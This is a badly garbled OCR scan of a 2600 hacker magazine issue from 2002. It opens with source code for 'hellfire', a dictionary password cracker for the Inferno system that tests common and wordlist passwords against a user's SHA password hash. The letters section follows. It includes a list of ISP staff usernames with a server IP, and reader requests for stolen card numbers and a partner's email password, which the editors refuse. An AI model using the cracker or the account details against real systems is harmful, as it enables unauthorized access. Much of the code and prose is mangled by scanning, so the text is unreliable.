init: in(etat: ref Draw-<Context, argv: list of string); 
usage: Tmi); 

finish: fn(temp: array of byte); 


$; 


innt(nil: ref Draw-<Context, argv: list of string) 
| 

sys = load Sys Sys-<PATH: 

draw = load Draw Draw-<PATH: 

biño = load Buño Bufio-<PATH; 

str = load String Sting-<PATH; 

arg = load Arg Arg-<PATH; 

pass = load Password Password-<PATH; 

keyring = load Keyring Keyring-<PATH: 


sys-<print( "\nhelifire, by dalai(dalai @swbtnet)\n"); 
sy¥s-<print("A Traumatized Production "h 


iftarey == nil) 
usage() 


dfile:= píile = uid :=""; 
arg-<inittarey); 


while((tmp t= arz-<opt()) l= 0) 
case tmp | 
W =< dle = arg-<arg(): 
‘u =< uid = arg-<are(); 
* >< usagel); 


| 


ifídfile = nil || uid = nil) 
usage y, 


dfd := bufio-<open(dfile, bufio-<OREAD); 


iiidid = nil) 
sys-<print( "Could not open SesAn”, dfiley 
exit; 


| 


pw i= pass-<get(und); 

ifipw == nil)| 
sys-<print( "Could not get entry for %sAn”, wid); 
exit: 


| 


sys-<print("“Cracking...\n\n"); 


pwhuff2 := array[keyring-<SHAdlen] of byte; 
pwbuff = array[keyring<SHAdlen] of byte; 


$ try some common passwords 
forín := kin > 4; n] 
ifín == 1) 
pwbulff = array of byte "password"; 
ifin ==2) 
pwhuft = array of byte uid: 
iffn == 3) 
pwhull =array of byte ""; 


keyring-<sha(pwbuff, keynng-<SHAdlen, pwhuff2, nil); 


tempi = string pwouif2; 
temp2 c= string pw.pw; 


if(temp2 == templ H 
finish(pwhulf); 
| 
I 


# if not, try the dictionary 
forídentry :="" ;5){ 
dentry = did.gets( in‘): 
ifidentry == nil) 
break; 


if(deotry [len dentry-1] == Www H 
hehk:= "i; 
(heh, nil) = str-<splitl(dentry, Ma”); 
dentry = heh; 

j 


pwbutff = array of byte dentry; 
keyring-<sha(pwhutf, keyring-<SHAdien, pwbuff2, nil); | 


templ := string pwbuff2: 
lempl := string pw.pw; 


if(temp2 == temp1)| 
finish(pwhulf}, 
| 
| 


sys-<print "done An”); 
sys-<printi "Have a nice day.\n"); 
exit: 


| fimshipwbuft: array of byte) 


sys-<print("Password is \"Ss\"\n", string pwbuff); 
s¥s-<prini("Have a nice day.\n"); 
exit; 


usage() 


sys-<print( "usage: hellfire -d dictionary -u userin”): 
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Sigits af Hope 


Dear 2600; 5 $ | 
Tháve' only jast dibéovered! our fidio hich i T 
last month’ “and have now downlaaded mast of this 
year's shows and also subscribed to 2600. On the sub- 
jectol DVD players, | work in a major consumer elec- 
tronics store here in Australia. In the last 12 months all 
major DVD hardware manufacturers have introduced 
not just region free but region selectable players that 
bypass any advanced region encoding. lt started with a 
few unknown Asian brands. Then Pioneer, Philips, 
Samsung, L-G, Panasonic, etc. all introduced these 
multi-region players (most also have mp3 playback). 


The only major manufacturer not to release a player of 


this type is Sony. Some of the cheaper brands can even 
be Macrovision disabled, This is a direct result of both 
government policy and consumer power, Government 
competition policy says you can sell any | DVD player 
in this country (as you alread y know opr competition 
watchdog 15 looking very closely at the whole region 
coding thing saying it may be used to artificially inflate 
prices) and the consumers decided they wanted multi- 
region. 

The amazing thing is the response we have had in 
DVD release times here. | was purchasing DVDs from 
the USA and Canada last year because there was a 
three to six month delay in the major release dates be- 
(ween our countries. The times are now around 
month or so for most major Movies, so I wait for the 
better quality PAL versions (sorry, but NTSC sucks). 

At the moment we are at the beginning of having 
digital television forced upon us by the media pants of 
the world, but that's another story. 

Breto 


This is an excellent example of the importance of 


regulating huge corporations by a government which 
represents the peoples wishes. Because our govern- 
ment and our corporations are virtually one and the 
same, consumers simply don't have the power they 
should have. If we éver succeed in pulling them apart, 
we may have a chance. Thanks for the inspiration. 


Dear 2600: 

| just got back from a major electronics store 
Known as "Fry's Electronics” and I got in some serious 
trouble. | don’t have my own transportation so | have 
to ride the bus all around town, When I was in this 
store, | pulled out my bus book to know what time the 
next bus would come by. In doing this I had to open 
my book bag that goes everywhere with me that had 
some back=issues of 2600 in it, Minutes later this guy 
asked me to show himwhat was inside my bag (since 
ho-saw me.going through it). | told him sure, why not. 
He opened my bagiand behold - ten issues of 2600, He 
said heaway going {6 Get security to escort me out. | 
asked why, He said iiwas for hacking the store com- 
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puters. I told him it wasn’t true and that all they had 
Wet@compiiters running winxp with no online access. 


He ¢laimed that he saw me doing it. I asked him if we 
Auld Eo down to the tech bench to talk to someone 
E who knew what a 


hacker was. He agreed. We talked io 
the department manager who said and | quote: "Please 
leave the kid alone. There is no way he was doing any- 
thing bad to the computers." About ten minutes later 
the manager said, "So kid, how is the MPAA lawsuit 
going, huh?" 
avatar 
For cases that don't end so well, it's important to 
know that in many places searching someone S bag in 
this way is illegal and can open the establishment up 
ro legal, de tion, 


Higher Education y E y 


Dear 2600: 


Iaf in hight hook right now andn our schpol 


| Computer theréTs a program installed thal censors the 


Internet, The Program is "Gear H" and it’s made by In- 
temel Content Management Software. | was wonder- 
ing If anyone knew anything about the program and 
some possible loopholes in it. 

ATth 


The word is aut. 


Dear 2600: 

Not myself being a person to exceed the bounds of 
the law (I try to adhere to a strict moral code), 1 had a 
brief skirmish with the authorities of my high school 
which, thankfully, did not advance very far alang the 
disciplinary lines. I would like to know the opinion of 
some other computer users, 

The school runs Novell Netware and (idiotically) 
did not turn off the feature that allows users to send 
messages lo each other. During a typing class | was 
forced to take, my fingers roamed across the keyboard 
and I began to look around the system. | realized that 
the system was allowing me to modify anything and 
that | could send messages to another user. After 
school, at a later date, I sent a message to another 
classmate in another room. A classmate next to me 
alerted the librarian that | was "using the computer for 
bad stuff." The librarian became red in the face and 


pulled me ta the principal’s office, She informed the: 


principal that I was crashing the network. I found this 
to be a ludicrous charge against me but didn't contest 
it, seeing as how it would upset the situation. | got off 
with absolutely no penalty except that all the computer 
teachers will be looking over my shoulder from now 
on. My question is whether or not sending a message 
to another user is a great offense. 
StMike 
The great offense is doing Something that the peo- 
ple in-charge didn't understand. Unfortunately, in most 
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high schools, that applies to almost anything that hap- 
pens after the power is turned ón. 







ha Kin such a bad way it 
uneer for the information 


rad 


oad 


guys at ion “point 1 me in the "right direction? 
way, you guys rock! 

Mingus 

We get about a dozen of these letters every day, Sa 

consider yourself honored that yours was selected d 


completely at random, There are a couple of ing . 


that have to be understood. First, relatively fempeop: 

are hackers, even though quite a few either wang to be 
or walk around saying they are. Most of whabconsti- 
tutes hucking is the whole process of f Ps frig. things 
out. While we can offer tips and suggest ons on spe- 
cific applications af technology, we cannot tell you 
how to think, That's something Vou either develop on 
vour own or not. If youkeep atopen mind and don't 


shy away from activities which most would view as a. 
complete waste of timejyoh re off to a good start, 4 Y 


learning a little history is always a wise move - ther 
are plenty of online resources in addition to our piga 
zine which document the milestones of our contmitade. 


Dear 2600: p 0 = 
Hey I need some help on finding som e Credit card 


and pin num so if you ca e 
and p bers you Y 


you a favor so hook me up. 








ss, 


EN ‘Asbigussen@ndlcom 

Consider yourself hooked ep. We per i reds of 
these requests every week, Most ranas of 
some bie media expose on hackers, ie 3 way, the 
media seems to be creating these people - they go on 
the air and print stories saying that hackers go pio 
sealine things and then the people whe go around 
stealing things see this and start calling themselves 
hackers. Perhaps we should come up with some choice 
definitions of media so that everyone equates them 
with liars, 


Dear 2600; 

I think my girlfriend has been cheating on me and I 
wanted to know if | could get her password to Hotmail 
und AOL. I am so desperate to find out. Any help 
would be appreciated, Thanks. 










HSFk2 

And this is yet another popular category of letter 

we gel. You say any help would be appreciated? Let's 
find out if that's true. Do you think someone who is 
cheating an you might also be capable of having a 
mailbox you dont know about? Do yon think that even 
i| vou could get into the mailbox she uses that she 
would be discussing her deception there, especially if 
we live in a world where Hotmail and AOL passwords 
are so easily obtained? Finally, would you feel better if 
vow invaded her privacy and found out that she was 
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being totally honest with you? Whatever problems are 
going on in this relationship are not going to be solved 
with subterfuge. If you cant communicate openly, 
there's not much there to salvage. 


Corrupting Youth 


Dear 2600: 

gust want to start by saying that I totally agree 
the first sentence of JohnG54429 s letter in your 
issue. It is great, what you're doing for today's 
-All that Pye Seen you print in your magazine is 






Sie E 
you | E h and AE it causes more American youth (like 
y the 


myself) ' wlose morale for this great country,” then so 
bei iAt Weds they won't have blind loyalty to a coun- 
try without knowing the truth. And maybe once more 
people réðlize this, we can all help to change the gov- 
“ernment so it will once again, be something we can be 








“Proud of. gan 
fs 7 ex_chronos 
Miscellaneous Info 
Just a fy ds up that the final build of Windows XP 


T version 5.1,2600 (coincidence?) default 
ins Äi doesn’t have any firewall protection enabled. 
(5 pee will have access to such services as smtp, 

p and netbios services. To enable your firewall check 

e box "Protect my computer with firewall" in the ad- 
gant: tab under the Connection Properties dialog 
box. I can't believe Microsoft didn’t inform the user 
about this option as the average computer user has no 
worries about Internet security, 

Also, the investigation of Enron will be done with 
a program called EnCase. This computer forensics 
program enables someone to view data after it is 
deleted from the most popular operating systems cür- 
rently in use. The web site http://www.guidancesoft- 
ware.conv/html/index:html allows you to request a 
demo disk. Don't spoil it for everyone by ordering 
20,000 of them overnight! If you know of anyone who 
has the full version of this, declare them your best 
friend and see if they'll burn ya a copy because it'll 
cost ya $2,500! 
~dissoluten 


Dear 2600: 
Please check out these important sources of critical 
information! 
hittp://projecteensored.org 
http://www.copvcia.com 
http: www. indymedia.org 
http://disclosureproject.org 
Empty Set 


Dear 2600: 
When I first was interested in programming, T did- 

n't Want to invest any money before I knew for sure 
what it was all nine | was saved by a great language 
called Python. | can interpreter: 


executes the so we line at a time instead of turf; 
ing it into machin sua pe yu ond Alst pecto 


ented, a near necessity, 
perhaps the most t appealie 
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their sone "Pass tA ALONE 


is free! The syntax of Python is remarkably clear, yet it 
stays powerful and competitive. It has plenty of docu- 
mentation all over the web and is a great language for 
beginners and experts alike. 

The article isn't much but in my opinion Python 
deserves a whole lot more respect. Feel free to edit and 
add on to this article, I just want a free t-shirt or 2600 
e-mail. 

Raleigh Cross 

It's rather clear that’s what you want. It's time once 
again to clarify our policy. Letters are not articles! 
And articles should not be written for the sole. purpose 
of getting free stuff. It's screamingly obvious when they 
are. 


Dear 2600: 
lam writing in response to dmitry kostyuk’s letter 
in your 18:4 issue. He was asking for a program to 
convert Microsoft Word files into HTML files. Mi- 
crosoft Word can save as an HTML file. To do this go 
to File-Save As. Click on the pull down menu labeled 
"Save as Type", select HTML. Type in a file name and 
hit Save. Also, I have not seen the specs on Microsoft's 
doc format. However, 11 is used outside of Microsoft. 
Sun Microsystems makes a free program called Star 
Office which is capable of using Word files. Hope this 
helps. 
Revanant 


Dear 2600; 

I just got my copy of 18:4 and was pleasantly sur- 
prised to see the letter by "No Name" on the @home 
Matin. | agree, the information he's given outis not 
much to hide one’s name or handle over. The Matrix 
does not, in fact, allow you to access someone’s com- 
puter directly, The Matrix works in a tier system. The 
higher the tier, the more access you have. 

Some of the higher tier accessing staff never both- 
ered to log oul afterwards. They were: matrix-users, 
majordomo, Matnix-Trouble, anita johsnton, agentile, 
bart_connors, bmartone, brutkowski, clowery, DHen- 
nie, Farrell Moseley, fschmidt, happlegate, jbrennan, 
jsapienza, jtreece, Irobinson, rsimmons, rsullivan, 
shill, 3177264581, twright, and jgrove. 

The Matrix was located at 24.253.207.77, but un- 
fortunately it was taken down permanently as of Feb- 
ruary 28th, 2002. However, the greatness of this 
system should not be forgotten and any who wish to 
learn more about it may wish to go to 
hip main. home.netidoc/Matrix6,pdat and read their 
Matrix User's Guide. 

Doodle 

Unfortunately with the demise of home, this ad: 
dress is no longer valid, If we find a mirror, we'll pass 
it along. 


Dear 2600: 

You may or may not already know this but | 
haven't seen it in your magazine or elsewhere. The 
British- anarchist band Chumbawamba put a remix of 
g" on their web page a while 
gos ‘feauires sound K ifs from Metallica, Dr. Dre, 
and E ninem, all apf ari without permission. Better 
yet, it has" cerpts from Jello Biafra’s H2K keynote 
speech. You Can n doWhload the song and read their 
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press release concerning it at: hitp://www.chumba.- 
com/_passitalong: htm. 

On a side note, General Motors bought the rights 
to use this same song (the album version, not the 
remix) in their recent Pontiac commercials. Appar- 
ently, Chumbawamba turned around and donated half 
of that money to CorpWatch, who plans on using the 
money to document the "social and environmental im- 
pacts of GM itself.” The other half went to Indy Media. 
Chumbawamba has a very interesting political past. 
Among other things, a member once dumped a bucket 
of water on Great Britain's Deputy Prime Minister 
John Prescott for his handling of a dockworkers’ 
strike. [t's good to know that a (relatively) mainstream 
band is this politically conscious. 

I love your magazine and hope you can prevail in 
your sia i yapa future endeavors. Good luck to you. 

ura J ubatus 


pa Ey Needed ( 


Dear 2600s 
y rij yest gurious to know if pour magazine has a 
minimim! maximum dength O for article 
submissions. Let mé Know, * 


A 
y 


Rick Olson 

aka Fluffy 

As indicated above, something extraordinarily 

short will probably be looked at as a letter Articles 

should be as in-depth as possible without being overly 

wordy. Since we wind up editing anyway, it’s best to 

give us as much infe as you can rather than too little. 

So there are no formal requirements either way - just 
go with your instincts. 


Dear 2600; 

I may excuse you because of the September 11th 
terrorist attacks but I sent you four photographs of 
payphones (by mail) and I don’t have my free sub- 
scription. | also sent an e-mail to letters@2600.com 
and the only thing L got was an automated answer. 
"Thank you blablabla...." Maybe sending to all of your 
addresses may work. Thank you for being so commu- 
nicative. 

Johnny 

First off, we have always been way too busy to re- 
spond to each and every piece of mail we get. Most 
people and certainly most magazines simply cannot do 
this. Second, we're quite clear on our web page that 
you will get a free subscription if your payphone pho- 
tos are printed, You seem to think that just by sending 
us photos you qualify. That's not how it works. Third, 
the automated answer you got from the letters e-mail 
address explains that personal replies aren't possible. 
Why vou then chose to enfer into an extended dialogue 
with an automated reply function is something people 
who do have time on their hands may choose to pon- 
der. Finally, all you succeed in doing by flooding us 
with annoying mail is to be labeled as someone worthy 
of being ignored altogether. 


Dear 2600: 

When exactly do you plan on releasing Freedom 
Dewntime? It's been about a year already since it was 
completed. You could at least release it on WHS; the 
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medium really doesn’t matter. 
haux 

We've wanted to release it more than anyone has 
wanted ta see it so we understand the frustration. We 
needed ta make sure we covered the legal bases with 
regards to the music we used since suing us has be- 
come corporate America’s latest sport. But we're 
happy to say that these hurdles are behind us and you 
should find ordering info in this issue and ón our web- 
site. Far now its in VAS format. We expect to have a 
OVD version sometime in the future. 


Dear 2600: 

| would like to contribute some money to the 
DeCSS appeal legal defense fund. Please let me know 
how to do 50. 

Bill Boyle 

The Efectronic Frontier Foundation covered the 
legal expenses for that case. You can donate to them at 
wmwweffore or by writing ro EFF, 454 Shotwell Street, 
San Francisco, CA 94 110-1914, 


Dear 2600: 

| attend a meeting of security administrators at my 
office every othér month. In your recent issue, there 
are two articles that I would like to photocopy and give 
oul at this meeting to give other attendees a better un- 
derstanding of what information is readily available to 
people trying to break into systems and why you must 
keep patehes current and lock down the server. What 
would be the proper way to get permission from you to 
copy these articles and give them out in the meeting? 

Anti-Christ 

it's amazing te us that people actually think they 
have fa de this. This constitutes personal use - you 
have every right to use excerpts of a publication in 
such a manner without asking permission. 


Dear 2600: 

My father passed away last year. Unfortunately he 
used my name and social security number in the past. 
Now I don't have a good credit report and | need help. 
Can you help me? I am the father of two baby girls and 
| would like to buy a house one day. 

lop 

Assuming vou don't want to continue the family 
tradition and simply use your kids’ SSNs, you need to 
clear your name. You seem to be under the impression 
that hackers go around wiping people's credit reports 
or creating new identities. Of the relatively few who do 
know how to easily do such things, hardly any would 
ever de itfor hire. And we dent talk to them. 

So the first step is for you to stop acting like you're 
guilty of a crime. Unless vou are. (We still wont be 
able to help you but we'd at least respect your hon- 
esty.) Uf it happened the way you said it-did, there are 
ways of dealing with it. Check with the Social Security 
Administration and the various credit bureaus and tell 
us what they sey. If you're forthcoming with them and 
den tdo anything stupid like ask people to help you get 
fake credit, you at least have a chance of setting things 
right. And even if that doesn't work, there are other 
channels which can give you a voice. 


Dear 2600: 
I've been reading 2600 for, well, most years | 





could read and comprehend what was wrilten on the 
pages of 2600. It comes time now that I have a band 
and we have been ripping our brains out for names to 
call ourselves and finally [suggested "2600." My only 
questions are: Is this legal? Is this okay with the writ- 
ers/editors of my favorite zine? | know 2600 is only a 
degree of megahertz used in phreaking, but it is a name 
trademarked by you. [s this all right? 
Drew 

It’s hertz, not megahertz. While it's a very nice 
thought, we wouldn't be entirely comfortable with a 
band going around with that name. What would hap- 
pen if you became really big and your music started to 
suck? People would forever associate the name 
"2600" with corporate rock and we'd probably wind 
up getting sued by the giant record company that 
signed you. Imagine the irony. But seriously, we have 
no say in this: You can call vourself whatever vou 
want. We'd be happier, though, if it were a reference of 
some sort rather than the entire name, After all, there's 
always the chance that we're going to quit this pub- 
lishing thine and turn inte musicians one dey, 


Dear 2600: 

While flipping through my recently purchased 
18:4 I noticed something odd. Some of the pages were 
blank! How ever will 1 build my wooden computer 
since pages 22-23 are missing? How will I know the 
outcome of the "Right Click Suppression" article with- 
out page 197 T will not be able to “Harness the Air- 
waves” as page 26 was also blank. In addition, 35, 35, 
39, and 42 were also blank. I hope this is just a case of 
a misprinting and not a larger conspiracy by someone 
to keep the information from reaching the masses. IF it 
was indeed just a misprinting, could the pages listed be 
sent or posted somewhere so that we could read the 
rest Of the articles that were to have been printed on 
these pages? 

SuperGuido 

If you have such a printing defect in this or any is- 
sue, send it inte us and we'll not only send you a re- 
placement, but an extra issue aswell for your trouble. 


Dear 2600: 

Just cunous - do you have information stored away 
in random pictures on 2600.com? Stegdetect reported 
that a few jpegs from your site have information stored 
with jphide. However 1 have been unable to crack 
them to determine if this is true.... 

Crim 


Dear 2600: 

At my law studies class this morning, we had a 
ouest speaker. It was a Secret Service agent. He 
popped in a tape that explained to us what the Secret 
Service was and why we wanted to be in it. Ina couple 
of scenes, they showed either your website or maga- 
zine. | can’t remember what the cover was though, so T 
don't know how old it was. Anyway, the video was 
talking about how the SS is very knowledgeable on 
technological forms of theft, fraud, and hacking and 
how! their agents ate, hoi trained*in investigating 


an ti 
cnt | pulling pup your web 
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keyboard. Just thought you'd like to know. Don't they 
have to ask permission for that or something? 

Kaoslord 

Ft Lauderdale, FL 

We're not concerned about our covers being used 

so much as we're concerned over the context. If 

they're implying by their use that we're involved in 

criminal ac tivity then we have something to talk to 

them about, We've been hearing about this video for 

sometime now - hopefully one day someone can, L gel us 





The meetings for Orange County are a joke. It's 
like a bunch of kids ina pissing contest. These people 
are making 2600 look sorry. 

john smith 

Let's be clear about our meetings and the relation- 
ship between them and the magazine. Our affiliation is 
a very loose one bur we do consider the meetings to be 
representative of what the magazine stands for. That's 
why we have a set of guidelines (available in the meet- 
ings section of our web pages or by e-mailing meet- 
ingsx@2600.com) which spell out what's acceptable 
and what isn't. For example, our meetings are open to 
the world. That means inevitably people who dont re- 
ally believe in what we stand for will show up. We can- 
not prevent this. Usually there are multiple sections at 
any single meeting - their only common point being the 
meeting guidelines. [t's important to remember that na 
one group of people “runs” any meeting. Therefore, to 
define it as you have means that either you're paying 
attention to the wrong people or the meeting has in 
fact been subverted by idiots who. don't respect our 
guidelines. The latter has happened in the past and 
probably will in the future. When we find out (and we 
most always do), our name comes off it and it becomes 
just an anonymous group of idiots in a mall on a Fri- 
day night. 


Dear 2600: 

To the “hacker” who was on Cool FM 98.5 (in 
Montreal) on 02/11/02: shut the fuck up! Thanks for 
telling everyone that hackers are nothing but simple 
thieves. [hope you die in horrible pain! 

tHri3z3 

There's nothing like an intelligent counterpoint to 

prove a point. 


Dear 2600: 

Lam sick of it. Pam sick of being labeled a crimi- 
nal. | am tired of being branded as a menace to society 
and a threat to order. | was Tipping through the TY 
channels and I started watching some movie. It was 
like Max Something Super Spy, but anyways all it was 
Was some anti-hacker propaganda crap that Holly- 
wood churned out. | am so tired of it. We are con- 
siantly-Selaganashed | because we are hackers. I hate the 

reptionsvof us. If you are a hacker that 

ineatis ¿all ¿yo dol ¿bredk into people's e-mail ac- 
counts aid write WT "Even looking at the dictio- 
nary iš pe irae gays a hacker is "a talented 
amateur bf co mipters, specifically one who at- 
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tempts to gain unauthorized access to files in various 
systems.” That is just not true, Hackers aren't evil, we 
are really good people. Bul everyone hates us. Why? 
Because we get the fallout from people who write 
viruses and stuff like that, that’s why. Because so and 
so wrote a virus and the media said he was a hacker, 
that means all of you hackers are evil, We get pinned 
with the blame. It's getting so bad that if you say the 
word hack people sorta cringe, like when you say mur- 
der E But if you try and hide the fact that 
a ha 


| Er € ES YO E Eat You let the media 
Sey] tee i | i N Ñ e ia ae 1. ‘ 5 
O E A an pos pho youl are. So be proud to be 
fe aT i pal Me Hn E f Y and j t you aie 
ian iF i $ Binary Burnout 


(Not La hakina | IS a tristie vio but the U.S. 
Patriot Act of 2001 says it is!) 


Mr. Brown 

Our biggest comfort in that regard is that we don’t 

have a whole lot of assets in the first place. Actually, 
that’s probably not very comforting at all. 


Dear 2600: 

Here is something I though everyone might find in- 
teresting to think about. A few days ago I received a 
code from a person asking me to crack it. A few days 
later I did and sent him the decrypted message to prove 
that I had done it. The reason he claimed for sending it 
involved a huge "worldwide underground hacking 


group.” While he seemed to give the feeling that this 


was something of a rather "elite" group, he mentioned 
no specifics about it. After sending him the decrypted 
code he proceeded to tell me that he worked for a gov- 
ernment agency in Australia called the ASIO (Aus- 
tralian Security Intelligence Organization) and that 
they were looking for people who could do things like 
crack codes, hack, and so on. After hearing this I had 
no desire to continue communication with this person 
but here is the interesting part. The second step for 
"joining" was to crack a harder code using a program. 
Easy, right? Yes, but here is the catch. After doing so 
they will hack the computer that you used to download 
the program to look at your hard drive. So basically 
they are looking for hackers and cyberterrorists but at 
the same time are recruiting hackers. Anyway, once 
they have hacked your computer (and this is govern- 
ment!!!), they will use your computer as their personal 
proxy. So if they are tracing a cyberterrorist and the 
eyberterronsl 15 smart enough to figure ont he is being 
traced, he will send a trace back. At this point it would 
lead to the ASIO’s "proxy," in this case my computer. 
So let's think about this. Now it looks like my com- 
puter is tracing them and the cyberterrorists go after 
this computer. Why would anyone in his or her right 
mind let this happen? Hope this gives everyone some- 
thing to think about. 
3-Com 
Oh it does. Like perhaps you've confused your 
computer with your TV sët. 


ee 


2600 Magazine 











Dear 2600: 

As if Carnivore wasn’t bad enough, now we have 
the government stealing our encryption keys to read 
the encrypted files that we have every right to keep pri- 
vate. This software known as "Magie Lantern” appar- 
ently installs a key logger on a target computer to grab 
the pass phrase used when pgp loads. Our individual 
rights are continually being violated by this “Cyber 
Knight” project that encompasses Carnivore and 
Magic Lantern. You gotta wonder what else they have 
up their sleeve. I say we hold public protests. More 
people need to be informed about this. 


silent 

In addition, when someone finally findy this thing 

on their system, let us know so we can print an article 

on how to detect it. In fact, we suspect there are people 
activelyirying toget it for just such a purpose. 





which would not only Se hat pda tele- 
marketers but because of the disconnection their soft- 
ware removes you from their database, | looked into 
the device and what it does is send out a tone (discon- 
nect pulse) to their switching equipment. Rather than 
spend $49 to buy this device, I had the idea of using 
my modem and sound card to generate the signal, so 
all you need is a bit of software and cable. Once | get 
this working and if no one has done this before, would 
you be interested in an article? 
Drwar 
We'd certainly like ta know. mare. We knew of no 
such “disconnect pulse" that could be used to get rid of 
anyone, let alone telemarketers. About the only thing 
we can imagine is that this device plays the three tones 
commonly heard before an intercept recording which 
might make their auto-dialers assume it's not a valid 
number I's little more than wishful thinking that this 
means the number would be purged from the database. 
This could result in other cally being last as well. But 
most importantly, paying 50 bucks to have these tones 
plaved would be a bit ef a scam, to say the least. We 
find a better service (assuming you don't want to pick 
pany calls that don display caller ID) is offered by 
many focal phone companies at a fraction of the cost. 
Callers who don't transmit caller ID are prompted to 
vay their names. The called party's phone then rings 
with that person's name and they can either accept the 
call at that point er reject it (or completely ignore it). 
Telemarketers who don't identify themselves never 
even ring egaa 
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Dear 2600: 

[am a long time newsstand buyer of your maga- 
zine, Which I’ve always found to be highly informative 
in its. articles, while the letters of a politica. bent tend 





you seem to suffer from a similar naivete as your read- 


Spring 2002 


ers when it comes to other technologies, like guns. 
Firearms ate simply a technology. like any red box, 
laptop, modem, network card, Captain Crunch Ring, 
or computer programming language. They, like any 
technology, can be used to enhance or detract from in- 
dividual liberty depending on the user, their intentions, 
and their actions. Thus, like any technology, firearms 
are morally neutral, inanimate objects. Just as a hacker 
could potentially ruin the life of any individual or 
group of individuals in the world via identity theft or 
other malicious abuses, any person possessing a 
firearm can similarly potentially ruin the lives of oth- 
ers. It ts the actual actions of the individual wielding 
technology that determines actual results, as you have 
so rightly stated so many times in the past with regards 
to various computer technologies. You should be at 
least as consistent when it comes to other technolo- 
gies, like guns, as well, 
Mike *retroman' Lorrey 
We ve always advocated the responsible use of any 
tod ‘hnelogy and that it's the user of these who 
pears ultimate responsibility for their use/misuse. We 
believe tools and technology that directly foster com- 
munication, education, and the furtherance of free 
speech should be made as widely available as possi- 
ble. This has always been our position, One simply 
cannot think of tools with obviousty lethal functions in 
the same way, however To do so is the height of irre- 
sponsibility. 


Dear 2600: 

In 18:3. E was reading your response to a Canadian 
on page 31-32, and you guys mentioned something 
about the Canadian election system awarding the win- 
ner to the person who received the most votes. This is 
probably a good thing. However, the Electoral College 
in the U.S. does serve a purpose, and that is to make it 
harder for the states that are more populated to wield 
power over the states with lesser population, thus mak- 
ing it harder for a presidential candidate to win the of- 
fice of President. Now, Edo not think that Dubya 
should have won the presidency (I voted for Ralph 
Nader, and nearly persuaded my mother to do so on the 
way to the voting booth), but abolishing the Electoral 
College would give much more power to the East and 
West Coast (for better or worse), and make it that 
much easier for the majority to force their will on the 
minority. This is something the Framers made espe- 
cially hard to do, and for a very good reason (i.e, slav- 
ery). 1 would like to know why you would have the 
Electoral College abolished. 





Jon McLaughlin 

If imposing the will of the majority over the minor- 

ty is such o threat, why dont we see systems like the 

Electoral College put into place for other elections 

and referendums? We're certain that we could find an- 

gry people in sparsely populated regions of every state 

who feel the people in the cities unduly influenced 
races for governor senators, representatives, ele, 

Should we vive these people more pow because there 





are less of them rds this not ju Jjustana of affir- 

mative action whieh Mises more hara than good? Bi 
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for minority candidates. The person who you and 
many others wound up voting for got, according to the 
Electoral College, a total of zero votes. Does that seem 
even remotely close to fair? 


Dear 2600: 

I noticed in your response in 18:3 to the letter un- 
der the heading "Guns," you wrote ”...oppression from 
the most powerful government in the history of 
mankind.” | just wanted to correct you. The most pow- 
erful government in the history of mankind in terms of 
power was probably ancient Rome and, as far as size 
and possibly even power, the British Empire. 

Joseph McLeod 

This will quickly devolve into semantics so let's de- 
fine our terms: By "most powerful" we mean most ca- 
pable of having a direct influence over all other parts 
of the world in a very decisive way, both militarily and 


levislatively. It's a frightening concept regardless of 


where you stand politically, 


Dear 2600: 

You do Mr. Conterio a grave injustice in your let- 
ters page (15.4). His arguments are the voice of reason 
- surely! 

Look at it like this: there's only so much gun crime 
in the USA because the criminals can get guns easily. 
And as Mr. Conterio points out, you usually only have 
to show a gun to deter a crime. Naturally, it has to be a 
bigger gun than the criminal has. 

So the solution is simple. Encourage everyone to 
get a bigger gun than the average criminal and carry it 
with them at all times. This does leave the poorer sec- 
tions of society more vulnerable (being unable to buy a 
big gun), but this is all to the good as it means the 
eriminals will target them, instead of respectable, law- 
abiding citizens (with money). 

But I wouldn't stop there! Who is to say thal adults 
have more of a right to life than children? And having 
seen the reports on atrocities in high schools over re- 
cent years, is it not reasonable to campaign for chil- 
dren to be able to defend themselves? Of course they 
should! "Guns In Schools" can be the campaign slo- 
gan. With proper training (it should be a required sub- 
ject), most children are every bit as capable and 
responsible as an average adult to own and use a gun 
(well, an average adult after a beer or two, anyway). 

| mean, if somebody went into a school with a ma- 
chine that could launch baseball bats faster than the 
speed of sound at the rate of one hundred per minute, 
would you ban baseball bats? 

I think my point is abundantly clear, and I trust 1 
mae pyp ka support in this matter. 
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ed ı fi ipads copy of Grand Theft Auto 
on: Xang he informed me that a guy on 
lo stafións.proclalmed "Free Kevin!” 50 
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for Poo eter da cay When I played I would set the ra- 


dio station to "Chat box" and after a while I finally 
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heard it. It was kind of pleasing to hear the message on 
such a popular video game. Then when | was looking 
through the booklet for the game, I noticed they listed 
guests for "Chatterbox" in the back. So | read through 
and noticed the name "Bernie $." Very nice. 

noire 


Dear 2600: 

Hey guys, great issue. I was walking out of Barnes 
and Noble at dusk with the magazine (18:3) in my 
hand looking at the cover. As I crossed under a light 
the glare revealed the secret item! The peace sign, I 
loveit. Always keeping us on our toes. Thanks guys. 

Gustaf 


Dear 2600: 

I was signed into MSN Messenger on January 10th 
at 11:10 Eastern Time, and I got a "Maintenence Alert" 
dialog box telling me that MSN will go down in five 
minutes for maintenance. If this happened to everyone, 
then there is obviously some way that you can call a 
dialog box on the machine of everyone who is signed 
into MSN at the moment. It kind of makes you wonder 
what kind of other events they might be able to initiate. 
If anyone had a packet sniffer running and caught this, 
or if you have more information on how this may 
work, please let us know. 

psykOmantis 


Dear 2600: 

I recently moved into a cheap three-story apart- 
ment building. One day I got curious and started to 
take the faceplates off the wall. Behind where my 
phone line came in | discovered not just one wire, but 
three! Upon further investigation | found that one was 
for my apartment, with the two others providing dial 
tone to the floor below me and the floor below them! 
Think about how easy it would be to tap into the line. | 
found a similar configuration for the cable television 
lines. Do you have a phreak for your upstairs neigh- 
bor? Are you sure? 

bluness 

More proof of how insecure phone lines really are. 

This is very unlikely to ever change. 


Dear 2600: 

I was watching the other day (again) the movie 
Hackers and something caught my eye on the desk 
where Kate "Acid Burn" Libby is preparing for her 
“battle” with fellow hacker Dade "Zero Cool/Crash 
Override” Murphy. That is a copy of the magazine 
2600. | wonder how many others caught this. 

Herman 
Another appearance occurs when the federal 
apent is dela "The Hacker Manifes to" in the Car 
y of our i a Tenian 
r lan 
e oni 
newsletter so they just revised history a bit. Also, check 
out the subway car scene as well as the wall in Phan- 
tom Phreak’s room. Those are original yellow HOPE 
bumper stickers from 1994, now worth many thou- 
sands on E-bay, 


Dear 2600: 
Ihave read before how someone used "safeweb" to 
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capo in "Phrack," no 
